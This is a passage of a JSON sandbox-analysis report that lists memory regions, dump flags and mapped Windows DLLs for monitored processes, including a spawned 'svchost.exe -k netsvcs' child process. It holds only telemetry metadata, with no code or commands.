"ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1689", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:33.916", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001690-addr_0x0000000000440000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_387", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4980735, "entry_point": 0, "filename": null, "id": "region_1690", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:01:33.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953464319, "entry_point": 1953431552, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1691", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:01:33.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953497088, "type": "region", "version": 1 }, "end_va": 1953873919, "entry_point": 1953497088, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1692", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953497088, "timestamp": "00:01:33.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953890304, "type": "region", "version": 1 }, "end_va": 1954148351, "entry_point": 1953890304, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1693", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953890304, "timestamp": "00:01:33.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1694", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:34.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1695", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:34.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1696", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:34.002", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001697-addr_0x0000000000690000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_388", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 7929855, "entry_point": 0, "filename": null, "id": "region_1697", "name": "private_0x0000000000690000", "norm_filename": null, "region_type": "private_memory", "start_va": 6881280, "timestamp": "00:01:34.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965359104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1698", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:01:34.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973354496, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1699", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:01:34.002", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001700-addr_0x0000000076e70000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_389", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_1700", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:01:34.002", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001701-addr_0x0000000076f70000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_390", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_1701", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:01:34.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1702", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:34.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1703", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:34.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001704-addr_0x00000000003a0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_391", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_1704", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:01:34.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1955004416, "type": "region", "version": 1 }, "end_va": 1955033087, "entry_point": 1955004416, "filename": "\\Windows\\SysWOW64\\winbrand.dll", "id": "region_1705", "name": "winbrand.dll", "norm_filename": "c:\\windows\\syswow64\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1955004416, "timestamp": "00:01:34.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960574976, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1706", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:01:34.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960640512, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1707", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:01:34.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961426944, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1708", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:01:34.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964179456, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1709", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:01:34.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965686784, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1710", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:01:34.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1968898048, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1711", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:34.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970143232, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1712", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:01:34.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970798592, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1713", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:34.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970864128, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1714", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:01:34.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993867264, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1715", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:01:34.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 6586367, "entry_point": 0, "filename": null, "id": "region_1716", "name": "pagefile_0x00000000004c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4980736, "timestamp": "00:01:34.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961033728, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1717", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:01:34.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974468608, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1718", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:01:34.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_1719", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:34.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_1720", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:34.023", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001721-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_392", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_1721", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:34.024", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001722-addr_0x0000000000200000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_393", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_1722", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:01:34.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7929856, "type": "region", "version": 1 }, "end_va": 9506815, "entry_point": 0, "filename": null, "id": "region_1723", "name": "pagefile_0x0000000000790000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7929856, "timestamp": "00:01:34.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9568256, "type": "region", "version": 1 }, "end_va": 30539775, "entry_point": 0, "filename": null, "id": "region_1724", "name": "pagefile_0x0000000000920000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9568256, "timestamp": "00:01:34.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 30539776, "type": "region", "version": 1 }, "end_va": 33959935, "entry_point": 0, "filename": null, "id": "region_1725", "name": "pagefile_0x0000000001d20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30539776, "timestamp": "00:01:34.025", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001726-addr_0x0000000000210000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_394", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_1726", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:34.048", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", "filename": "c:\\windows\\syswow64\\svchost.exe", "id": "proc_12", "image_name": "svchost.exe", "monitor_reason": "child_process", "monitored_id": 12, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2092", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:03:34.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2093", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:03:34.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2094", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:03:34.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_2095", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:03:34.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 606207, "entry_point": 0, "filename": null, "id": "region_2096", "name": "pagefile_0x0000000000090000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 589824, "timestamp": "00:03:34.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_2097", "name": "pagefile_0x00000000000a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 655360, "timestamp": "00:03:34.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 835583, "entry_point": 0, "filename": null, "id": "region_2098", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:03:34.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 0, "filename": null, "id": "region_2099", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:03:34.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 16646144, "type": "region", "version": 1 }, "end_va": 16678911, "entry_point": 16646144, "filename": "\\Windows\\SysWOW64\\svchost.exe", "id": "region_2100", "name": "svchost.exe", "norm_filename": "c:\\windows\\syswow64\\svchost.exe", "region_type": "memory_mapped_file", "start_va": 16646144, "timestamp": "00:03:34.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2101", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:03:34.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2102", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:03:34.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2103", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:03:34.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2104", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:03:34.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2105", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:03:34.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2106", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:03:34.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2107", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:03:34.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2108", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:03:34.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2109", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:03:34.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_2110", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:03:34.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_2111", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:03:34.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_2112", "name": "private_0x0000000000480000", "norm_filename": null, "region_type": "private_memory", "start_va": 4718592, "timestamp": "00:03:34.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": 